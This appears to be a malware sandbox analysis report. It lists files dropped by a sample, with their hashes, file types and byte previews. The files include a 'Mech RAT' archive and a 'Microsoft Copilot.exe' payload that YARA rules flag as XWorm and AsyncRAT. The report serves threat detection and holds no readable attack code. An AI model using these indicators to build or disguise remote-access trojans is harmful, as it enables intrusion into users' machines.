                                                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                    Malicious:false
                                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                                    Process:C:\Users\user\Desktop\PixpFUv4G7.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:modified
                                                                                    Size (bytes):6550613
                                                                                    Entropy (8bit):7.997617075553934
                                                                                    Encrypted:true
                                                                                    SSDEEP:196608:4MloB15b1lWrh91ptjKq1G+BxPzzotwNp89r+vy/:4DJRwrhPptjKq1rJS9iy/
                                                                                    MD5:75AD287A4A283544F660559B7627D329
                                                                                    SHA1:85B76B60FB76060A3BD441EA9C37369D357AB138
                                                                                    SHA-256:60F8C1236F86928CF5616A7B2FFF4B3ACFBECC39BF818EA8E03916ACA5012E56
                                                                                    SHA-512:71ED909A0F06BD2CC7015C7ED7FDA93C13C0BBFE00D9595A6CB79669D1F0B697BD4B6AF091B52B1412ED0352F73BC149AFCC117B55BD2251E92CB5907FC6C3EA
                                                                                    Malicious:false
                                                                                    Preview:PK........*eEY.............. .Mech RAT/UT...0l.g\l.g...fux.............PK........$eEY.............. .Mech RAT/aa-DJ/UT...%l.g\l.g%l.gux.............PK.........eEY............#. .Mech RAT/aa-DJ/Quasar.resources.dllUT....k.g+l.g%l.gux................\\M.'.@..........$..w...!8................7....v.ogo..e.N.9u._Jzq.......//.@.._.(......hd-h.z.Q.&(.QrMk.W.......=.......dj.rqw..8.$U4@......HT..P.....`...PV...................0...^.._.......7...K...o......{%}....?...#...._|.a.wR..P.....?.....i...mf7./7H.Z.\..B./,..]\]. ..{[.G.o...rV....v..B.....W..B'.?o.x._4.{....&......P...B6..........<i....y.4.].,..-\..].,\...nabn....w5st..1e.i[...8:.q2....A..vn...B...n.&v. UwS;.3..oMG[..!S....3.n6>.N.V^>..u1w.7.{...a..*..T....^.......Y......;.+.b...dc3.b5.0......q.7q..a!.?.ul...=]...].]...M.,.m\.4.\,L._u....?..U1.../.'l/.K........,:...3&.f.....8....O...v.....3......(R[....I.#..4.u]. g%...EB...R2A.-..7.)a ...4~=J.x..$...!/..ON!m-H.....P.......+.. .0.8...2..W..`..t....4!_G..@.....s.(A....
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):71680
                                                                                    Entropy (8bit):6.095413522527565
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Q1V7h9TmCQFaZvmb5hcnl5xbdCPsPlyxCwtX5KG6lO14JWG:QLfTHMAtbdCPSeJKtO14wG
                                                                                    MD5:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    SHA1:4A5B7EA6C89DCD73D7C87EC7B3A7B3B266CCCD9B
                                                                                    SHA-256:D2F99E47B2E4C82BCC45E74FE83792F5C90E530B02A8B65837F256008F8A1C98
                                                                                    SHA-512:0FB243D4D9DAD3365E165500B8594B4208E1A9AB0CDF1DA778F6DFC43381357A8306C9EF2C34D8426D6E8EF48649918A2FBC81E2C5E5F2C573BF9F2CA8C9A5A7
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 84%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.g.............................-... ...@....@.. ....................................@.................................p-..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........c..........&.....................................................(....*.r...p*. C{..*..(....*.r...p*. 6V=.*.s.........s.........s.........s.........*.r+..p*. v...*.r...p*. S...*.rU..p*. ..n.*.r...p*. ....*.r...p*. ..d.*..((...*.r2..p*. . ..*.r...p*. `..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rl..p*. .'..*.r...p*. ...*.r!..p*. ..e.*.rA..p*. ~.H.*.ra..p*. ...*.r...p*. .h..*.r..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3316968
                                                                                    Entropy (8bit):6.532906510598102
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:JIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9Y:6BbBWIgWljGxRB/LLY
                                                                                    MD5:0CF454B6ED4D9E46BC40306421E4B800
                                                                                    SHA1:9611AA929D35CBD86B87E40B628F60D5177D2411
                                                                                    SHA-256:E51721DC0647F4838B1ABC592BD95FD8CB924716E8A64F83D4B947821FA1FA42
                                                                                    SHA-512:85262F1BC67A89911640F59A759B476B30CA644BD1A1D9CD3213CC8AAE16D7CC6EA689815F19B146DB1D26F7A75772CEB48E71E27940E3686A83EB2CF7E46048
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: PVUfopbGfc.exe, Detection: malicious, Browse
                                                                                    • Filename: OqAVRCkQ3T.exe, Detection: malicious, Browse
                                                                                    • Filename: PVUfopbGfc.exe, Detection: malicious, Browse
                                                                                    • Filename: OqAVRCkQ3T.exe, Detection: malicious, Browse
                                                                                    • Filename: mapMd1URzq.exe, Detection: malicious, Browse
                                                                                    • Filename: mnFHs2DuKg.exe, Detection: malicious, Browse
                                                                                    • Filename: External.exe, Detection: malicious, Browse
                                                                                    • Filename: newvideozones.click.ps1, Detection: malicious, Browse
                                                                                    • Filename: use_2024_t#U043e_#U043epen.zip, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....6Q3...@.................................G&1.O.....2..............|2.. ....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):176
                                                                                    Entropy (8bit):4.975948294614847
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vFWWMNHUqoyELAz5cIMOoIRuQVK/FNURAmIRMNHjFHr0lUfEyhTRtaKWREBAW4QA:TMVBjzGIffVKNC7VJdfEyFRtUuAW4QIT
                                                                                    MD5:DC77BDB7FBF40A24BAAE4FDC78B72F44
                                                                                    SHA1:33F43AC03CFD4CBEF328AD131272250EEF029D42
                                                                                    SHA-256:40FA7D2CF05768C2C660556ED04AE1A2615B02516EC1B059778E065B0B259043
                                                                                    SHA-512:734752575B9B82E1A1EB838720811C272C0962AE99205B543E95940590EC476428CE201C9FB8BADA57ADDE186C3CB9E47A088C62BBE1C0B1C0F0083AF3B9463D
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" standalone="yes"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>..</configuration>
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):270398
                                                                                    Entropy (8bit):4.5120637222906375
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:jUxtMIvpnIX79rXlSrLFGjLnfQ7KSa/ES6ATR6Wsv76Jm:IxaQpnIx567KP8S6ASv
                                                                                    MD5:0E5C95BD5D3F9AE7084C0A03F58C3F83
                                                                                    SHA1:9D65BA00FE59C149802D720890CA556E4A9B5660
                                                                                    SHA-256:78BD9885FC0A2AC15C16C0A54F4ADA9FE60FFB5CE9529FE4BBD2A6E448E01173
                                                                                    SHA-512:852FACBCB874A468626C4E7A769FFFE37BE9F1E3697B791DFE03958F50160699B4833250D1B96463900B0DE558AE926381F9A11681AA176F82F630A866C2F71A
                                                                                    Malicious:false
                                                                                    Preview:............ .( ......(............. .........'...'................................................................................................................................................... .........................""".&&&.&&&.$$$.............................................................................................................................................................+++.HHH.ddd.yyy.........zzz.xxx.xxx.uuu.mmm.ccc.ZZZ.UUU.VVV.WWW.OOO.UUU.HHH.(((. .666.555.(((...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):16958
                                                                                    Entropy (8bit):3.1707565992614586
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MFSDngMp7jxrH8WdTZyHAD3AKK+luRD0TRXDwPaHG:WcpPxN93+ZDSUam
                                                                                    MD5:F2B9AF71FD5CF7C2DA55BB60DFD24312
                                                                                    SHA1:AB09967BD37C24B7890ACC69A574292880E24CC2
                                                                                    SHA-256:07FD7AFACCFC448E4CD58AC4A60811E72586B10EF78055EE4D37699ED5AAA3F2
                                                                                    SHA-512:0E83EE23ADBF56C89ECFC7B7F50B63FB2BA8530EEB13B1414F8EA000B64F3352BD9DD192ADB1D8C00A9AFD19663C44DAEA288D866CF6E1D18748E0677D07F4EC
                                                                                    Malicious:false
                                                                                    Preview:......@@.... .(B......(...@......... ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|....6.H.P.P.H.6...~............................................................................................................................................................................................................Z.............................Z........
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):42406
                                                                                    Entropy (8bit):7.982008950741705
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/OxiQ16OumQNpQdHUftQVu2UXRViJopWsVEaTpZIfA2oAgPjb3lMrRtw5iqlzNf:ciQuXQA0u2UhgJmWETbIIx6Ylzd
                                                                                    MD5:21443C51CB5B3381690F0BDF2153D895
                                                                                    SHA1:A415F520B1D51D3BA0917069616634EDC39CCB10
                                                                                    SHA-256:962344871E6094E827937AD6308346F6FE74A454A9B6851A72DB23A5F4F5C800
                                                                                    SHA-512:29BCE1D1CD4BB7CC06F3F4B4CF29929EF45A86FC2E758AA9FBD09AB8CD4F3BDFFDCC0FF9266F6421B2B39188824B91515F24DA62E83E0EF62ED57188A2BE99AB
                                                                                    Malicious:false
                                                                                    Preview:............ ..........PNG........IHDR.............\r.f....IDATx...W.$.......v..#Rk.L .@B#!...X.. .b.lvU....9..3g.m...>.>.....%........ .$..."u&Rgh."\....s.077s7..L.d\..G...v.~.O...k0...S.U...Z.......:.v`..a.kcm8.,0....."0..........'.o...g...........`7...Y.A...}.6..C..[Z.].I.,p....y.(....sC...................@.........H...q...X.).y`...x...).J..N.........C...#.-..>....................*0c=.z..u....k.>./.....k{`m....b......?...'..:.8.....;1.y.k.ym...CbJ..0.._/ XU..m!~.7...Q`=...6...hm$.......&(.pj..`U.`w-..*....;1E...6.....#...3...V..6...&..0..=k.mm..U.:.+.....3.`E .l...........?......X......L.z..J......L..\... .....#....%!....X...CX.Kp=.m:.;....:.+_.".h+ ~......~.J.~...# :.",.m..k .6.....dR"3...f`0...l........3.Y.T....] ...".2...f....(..eHA...@.V ."(........? ..?2'a..9.9....c.0C.*A.+..s........S.O......<7../.....E.@. ..D.@..D.@.U......6.....T>...c.@NK.4?'....rA..Tp.....R......[Z._`. ...b.kC.4P6(([.?..D.b.2....F.k...*.o.i.S&....S:rN..^Y.].....o..@S/..].P
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):10442
                                                                                    Entropy (8bit):7.605403323027397
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:icwaX5VXjXZNpcH/sxs6pjox6en5CHSGn4MefYx53hoehTsWRPJLOx4wYOIxVUKH:icwqXFNM/sx5pjox6enQHJnreQJJTsAf
                                                                                    MD5:D7E21DD77BD1903D5CB570A052EC7D50
                                                                                    SHA1:49225383472138809F6CE22C024A823C0C5781CA
                                                                                    SHA-256:17EAC031FC6220B4B5FD5D9D6743DBBF428FBAC280D9BBF80CF8988DF68E001C
                                                                                    SHA-512:4ECE91BD40B8DDA8CE9ADF6AAB86EB504A78B9929EE1DEB1D25159BE229C836C9BFDEEAC6C1C8A454992583C317394155FEC0B00B51449C275EB50C1DDC2CA4A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR..............x......pHYs..........o.d....tEXtSoftware.www.inkscape.org..<... .IDATx...k.]U...{....&&..Z. ...........rT ..9...;.k.....xD..........{..v{...CRU...H.5...*&$uX.j...1..w].PC......x........................................................................................................................................................................................................+x.H....?..#...&..w. W...K.?.s..Z....rlj.%.,.jy.@Nl.Q*.......(...z.H...e:O...;..#...$]..#....w..Q.P.....L..:B1\xGH...e[o:.$..@NL.WJ..;GLzC.....l'H...C.yi}R..)bR...l..T..J.T.....m..y.H......M..S.90..C..s...rP.P.....C..;Alz.........3.%...I.6x.......".Zz.Z..@.F?!q.....P........<....$.........M.s.S.)2..%..z.M.)d...e...JA.f..@..m.g.1x._.^\..m5...H.I-)l...#...C.@..Jc.....e.....N...'.......2.K.{f..<.(...u..4..;....xW.U.9..$....,...#...C.i....S.7..-F)(....0.@.8F{>........E.^......{....s.-....F.`.. .#.a.`.(...z...!....VH..;G...\....D...;..'. i.w.XY.dm.@.(....8.9.xo,..
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):270398
                                                                                    Entropy (8bit):4.471581894685283
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:WhxL0cMzogYX2KGQRIruG3bw1VULvPj0aZujHL+aJ+Q0Zrh3333333tR333333Sx:icihOZcTzJKfGX7i4KKD3Zd
                                                                                    MD5:318504965C865DE5C19AE4F26CFAB2B4
                                                                                    SHA1:80424240F013F8EA3FC61C7FD96F9D3E8834684E
                                                                                    SHA-256:307F5FD5C70F367E7F8F07AB3D28C44E1E3E4998CE80CA84A7C3CEA1898EBC52
                                                                                    SHA-512:444BD7606517692175EF0574EDD09F050D72C265FE9A70A78892691ECA68AECCC3648ECD6F5C8D343BEBCD1EB6673D2FC5970A8333109221EB81D7E38351C797
                                                                                    Malicious:false
                                                                                    Preview:............ .( ......(............. .........'...'.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):37847
                                                                                    Entropy (8bit):7.983005948303856
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:X3A0BkL6hIkAbbT9jdJmZ2F1+ZoZd8DADi27GIjlvfWjKR68pbwuo7:9W6e3hv10ct1wK48pU
                                                                                    MD5:9D5FF9DC2B7F487DA684F928D4CF8614
                                                                                    SHA1:DC2608CF5E0F3396393489767BF2AA4C848F6224
                                                                                    SHA-256:42C78DD9D053C047633B9D1A826E7804533F259B4645816EFF67D052781B8DC6
                                                                                    SHA-512:6DF81190728F011F644623C0279E6414B05EA51FF5C9AC1A7C7877F3E5FA31604287CB01702B78B0DB63A02A4CA1ABF235520B1F1E038981C95287269CCF307E
                                                                                    Malicious:false
                                                                                    Preview:............ ..........PNG........IHDR.............\r.f....IDATx..}w..W....u..&.hI.dY..gp..cL4...#...w........#..#.#.c.s.9..eK..,.J.;3...G..=....V.?c.....t..W.[..:..t.#..HG:..t.#..HG:..t.#..HG:..t.#..HG:..t.#..HG:...B...n......o5..f..h._......5...E.M...z'7U..mJD`U..W....lE..~$.....].[.uOn.?k.vnsG:......^....h.. =.j.....G.[_.yh..C.iO.Z.....4U&x..1.f.Z..DU....&.^.j"....%2..>.......A..a..X.........Hu..<n0.tNw...z.>}..iO.o.....-.:K^2wf.@t.c..E~..b\........|z..........6.y.._P.?...A.N.,...h...x..[cm.P.T..E..BU."..J..@. UxL......"0...%.Ba!..,.............;l.V..{t._{.....o..:w.~O.W.....V..Sg..s.vV.8..~.....c.-.V..^..[...[>:!Y.......[...PjB..70{n..9.................a(.D..F.M....AK.Df.T..&....B. ..N..@PU...b.W$......U.N..`......k&$.b....[.%7..."R....7..'=.....}.}..Y;4...m:}..w...+.t.M.C...<............2..Y.5..nAKh....U(..Y>3......e+..~8.....J n..uN.m.=.....m.j.o,..?x}k.....CiQ@-.w..0#6.&;]..P.n(.D.RSb.4....J..2.O.;y.f.........2X..d...G...nU.K...._n.
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 5 icons, 48x48, 32 bits/pixel, 64x64, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):99678
                                                                                    Entropy (8bit):4.223791582668927
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:RBrn6a7/Zu/M615kfNOfEK3EpQkGhD94TtcmeVQU71qiLSeznFkKeUqvllR/t6c1:RBz65/M6If+3Js+3JFkKeTn1
                                                                                    MD5:4F409511E9F93F175CD18187379E94CB
                                                                                    SHA1:598893866D60CD3A070279CC80FDA49EE8C06C9B
                                                                                    SHA-256:115F0DB669B624D0A7782A7CFAF6E7C17282D88DE3A287855DBD6FE0F8551A8F
                                                                                    SHA-512:0D1F50243A3959968174AA3FD8F1A163946E9F7E743CBB2C9EF2492073F20DA97949BF7D02C229096B97482FF725C08406E2E9AA72C820489535758470CF604F
                                                                                    Malicious:false
                                                                                    Preview:......00.... ..%..V...@@.... .(B...%........ .h...&h.. .... ......l........ .(...6}..(...0...`..... ......$.........................................................".......7...=...?...;...2...&...................................................$...?...B...............................................................................................,d>6e.]P..eW..ra.p`.j[.[O.b<4....R...F...2.....................................RGO.q..n..OE....U...@...(........................................................................... .aS..}k..r.................q..vf..WK. ..b...F...*.........................PDR.r........p..ud.`;3....P...9... ............................................................oF<@.}m..|......................................{..ue.jA8....P...1.................eVp.u.....................|l..cV.8".p...J...3.....................................................YKM.v.....................................................xg..VJ....R...0.........k\..
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):118209
                                                                                    Entropy (8bit):5.0290982507103505
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VDRRKECMsn3H2GkmPe3KUDlGEJ57ukb8rJXAtnvWrpLDvZ8EZN:tjls3WGkoe6Uso9T8r9AtnertLFN
                                                                                    MD5:AD1740CB3317527AA1ACAE6E7440311E
                                                                                    SHA1:7A0F8669ED1950DB65632B01C489ED4D9ABA434E
                                                                                    SHA-256:7A97547954AAAD629B0563CC78BCA75E3339E8408B70DA2ED67FA73B4935D878
                                                                                    SHA-512:EEE7807B78D4DD27B51CEE07A6567E0D022180E007E1241266F4C53F1192C389BE97332FCD9F0B8FDA50627B40B8CF53027872304A68A210F4D754AA0243B0C2
                                                                                    Malicious:false
                                                                                    Preview:............ .SH..f......... .(....H..@@.... .(B...P..00.... ..%...... .... ............... .h...Y....PNG........IHDR.............\r.f..H.IDATx..y..U.........o.B.}.......eI.(dP.m..7..8....2..D..@PPq.\X.V..@.dOHw...~..u~.T..u..z...|>...S.9....=.E0. ..QP..,B2...,E..."...@......H.R..a. .>...N$..... .T...;'*.....BT..E.........E...............0I.)Od......... %@.......`.B>......b.9..........e+.5..q.Fv..NE..uQ.^._...v.....+.c.?...|^^97Qi....F..........\...`...L.6..g...B......h..N.~...]..C.yY...('.n..w.(..G.X........_.7.8.0.0R.!/..Ui.......@l..g...g.mH.....Y....u./.l..@..I...c...)...w......~....B..^.J.l...&c..W.\L.<1..$........r.:..o......!...#p....tK~.*...,.*B.G.}.NR.r..K..g.B.P3B..h...&$u..F..4..h...H".....H!I.1`..00...L.c...!.D.A..\.H-.G.Pq.j..w...DA...?..."Y...........#.o#.$.Z..@......hC. M.F$M@-B*..7...KB.h....a.C0.O2.......O..&.$RMBL..{.M..._............].M..A`....FX..2.i.L.......+.... v..r.\=...........!T?.!........R~...m..@...[...SW..V;...
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 48x48
                                                                                    Category:dropped
                                                                                    Size (bytes):9662
                                                                                    Entropy (8bit):5.357535365414906
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:hc4i1w+DSf0RxO/Csg9nL2CupMqM4pSg36IfgT9A+QdwhFKQfkIvxIm3sW88H:qa+DSf0RxOQnLjoSg3hfG5/X8cOO88H
                                                                                    MD5:1C2CEA154DEEDC5A39DAEC2F1DADF991
                                                                                    SHA1:6B130D79F314FA9E4015758DEA5F331BBE1E8997
                                                                                    SHA-256:3B64B79E4092251EBF090164CD2C4815390F34849BBD76FB51085B6A13301B6D
                                                                                    SHA-512:DCEEBC1E6FDFE67AFEBAEF1AFF11DD23EDA6FAE79EB6B222DE16EDEBDFEBD8E45DE896E501608254FB041824080CB41C81AC972032638407EFC6BFEB930BFD00
                                                                                    Malicious:false
                                                                                    Preview:......00.......%......(...0...`..... ..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... %!.*9+@...%....................................................................................................................................................................................4L7A.O...1.....6................................................................................................................................................................................4^9p.d...5...7.....M...(......................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 48x48
                                                                                    Category:dropped
                                                                                    Size (bytes):9662
                                                                                    Entropy (8bit):3.5584691731100597
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:8mEKEEjOjzSId77Fe0ggzSXlYtAMXa77gieRHw9S1IId:HUNdsgzS1EAEaHB8IId
                                                                                    MD5:4EA9AB789F5AE96766E3F64C8A4E2480
                                                                                    SHA1:423CB762CE81FAB3B2B4C9066FE6EA197D691770
                                                                                    SHA-256:84B48CA52DFCD7C74171CF291D2EF1247C3C7591A56B538083834D82857FEE50
                                                                                    SHA-512:F917059B6F85E4A25909A27CAD38B1EF0659161C32DF54860226FF3D858127D8DA592EA9072AD41D5A9986DD8C04A37E9AD34E2251883A8C2F0933E6AA201414
                                                                                    Malicious:false
